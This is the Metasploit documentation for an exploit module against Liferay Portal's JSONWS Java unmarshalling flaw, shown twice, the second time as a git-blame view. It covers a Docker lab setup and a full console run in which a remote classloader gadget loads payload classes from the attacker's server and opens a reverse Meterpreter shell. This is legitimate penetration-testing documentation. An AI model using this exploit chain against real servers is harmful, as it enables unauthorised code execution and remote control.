documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md

## Vulnerable Application

### Description

This module exploits a Java unmarshalling vulnerability via JSONWS in
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.

### Setup

Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
Follow the instructions for your platform and distribution (if using
Linux). If you're using OS X, you may prefer to `brew cask install docker`
after installing [Homebrew](https://brew.sh/).

**Note:** You may want to increase Docker's memory capacity up to 4 GB.
Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.

Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).
Any dependencies will be pulled automatically.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This targets Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4,
and 7.2.1 GA2.

## Options

### SRVPORT

If you are testing the [Docker container](#setup), which binds to port
8080 by default, set this to a different port to avoid a port conflict
with the remote classloading server.

## Scenarios

### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)

```
msf > use exploit/multi/http/liferay_java_unmarshalling
msf exploit(multi/http/liferay_java_unmarshalling) > options

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2


msf exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer    : 588a96d744cb
OS          : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >
```
Add module doc 2020-04-08 18:20:25 -05:00			`## Vulnerable Application`

			`### Description`

			`This module exploits a Java unmarshalling vulnerability via JSONWS in`
Update post-RuboCop style in my recent modules 2020-04-22 10:44:07 -05:00			`Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1`
			`GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.`
Add module doc 2020-04-08 18:20:25 -05:00
			`### Setup`

Add note about installing Docker 2020-04-14 21:19:54 -05:00			`Install Docker using the [official instructions](https://docs.docker.com/get-docker/).`
			`Follow the instructions for your platform and distribution (if using`
			Linux). If you're using OS X, you may prefer to `brew cask install docker`
			`after installing [Homebrew](https://brew.sh/).`

Add note to doc about Liferay being a memory hog 2020-04-14 16:01:52 -05:00			`Note: You may want to increase Docker's memory capacity up to 4 GB.`
			`Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.`

Add module doc 2020-04-08 18:20:25 -05:00			Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
			added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).
Add note about installing Docker 2020-04-14 21:19:54 -05:00			`Any dependencies will be pulled automatically.`
Add module doc 2020-04-08 18:20:25 -05:00
			`## Verification Steps`

			`Follow [Setup](#setup) and [Scenarios](#scenarios).`

Update my module documentation to the new standard 2020-04-20 20:06:52 -05:00			`## Targets`

			`### 0`

			`This targets Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4,`
			`and 7.2.1 GA2.`

Add module doc 2020-04-08 18:20:25 -05:00			`## Options`

			`### SRVPORT`

			`If you are testing the [Docker container](#setup), which binds to port`
Reword sentence to avoid "too" many "to"s 2020-04-14 21:28:41 -05:00			`8080 by default, set this to a different port to avoid a port conflict`
			`with the remote classloading server.`
Add module doc 2020-04-08 18:20:25 -05:00
			`## Scenarios`

			`### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)`

			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf > use exploit/multi/http/liferay_java_unmarshalling`
			`msf exploit(multi/http/liferay_java_unmarshalling) > options`
Add module doc 2020-04-08 18:20:25 -05:00
			`Module options (exploit/multi/http/liferay_java_unmarshalling):`

Switch back to options (show options) in doc 2020-04-14 22:24:01 -05:00			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'`
			`RPORT 8080 yes The target port (TCP)`
			`SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0`
			`SRVPORT 8080 yes The local port to listen on.`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`SSLCert no Path to a custom SSL certificate (default is randomly generated)`
			`TARGETURI / yes Base path`
			`VHOST no HTTP server virtual host`
Add module doc 2020-04-08 18:20:25 -05:00

			`Payload options (java/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The listen address (an interface may be specified)`
Switch back to options (show options) in doc 2020-04-14 22:24:01 -05:00			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2`

Add module doc 2020-04-08 18:20:25 -05:00
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1`
Add module doc 2020-04-08 18:20:25 -05:00			`rhosts => 127.0.0.1`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3`
Add module doc 2020-04-08 18:20:25 -05:00			`lhost => 192.168.1.3`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888`
Add module doc 2020-04-08 18:20:25 -05:00			`srvport => 8888`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/liferay_java_unmarshalling) > run`
Add module doc 2020-04-08 18:20:25 -05:00
			`[*] Started reverse TCP handler on 192.168.1.3:4444`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.`
			`[*] Using URL: http://0.0.0.0:8888/`
			`[*] Local IP: http://192.168.1.3:8888/`
Be more verbose and validate classloader server 2020-04-13 15:18:02 -05:00			`[+] Started remote classloader server at http://192.168.1.3:8888/`
Update print and comments 2020-04-14 23:06:27 -05:00			`[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column`
Add module doc 2020-04-08 18:20:25 -05:00			`[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested`
Rename exploit_class to constructor_class 2020-04-10 02:13:46 -05:00			`[+] Sending constructor class`
Add module doc 2020-04-08 18:20:25 -05:00			`[*] GET /metasploit/Payload.class requested`
			`[+] Sending payload class`
			`[*] HEAD /metasploit.dat requested`
			`[+] Sending 200`
			`[*] GET /metasploit.dat requested`
			`[+] Sending payload config`
			`[*] HEAD /metasploit/Payload.class requested`
			`[+] Sending 200`
			`[*] GET /metasploit/Payload.class requested`
			`[+] Sending payload class`
			`[*] Sending stage (53928 bytes) to 192.168.1.3`
			`[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: liferay`
			`meterpreter > sysinfo`
			`Computer : 588a96d744cb`
			`OS : Linux 4.19.76-linuxkit (amd64)`
			`Meterpreter : java/linux`
			`meterpreter >`
			```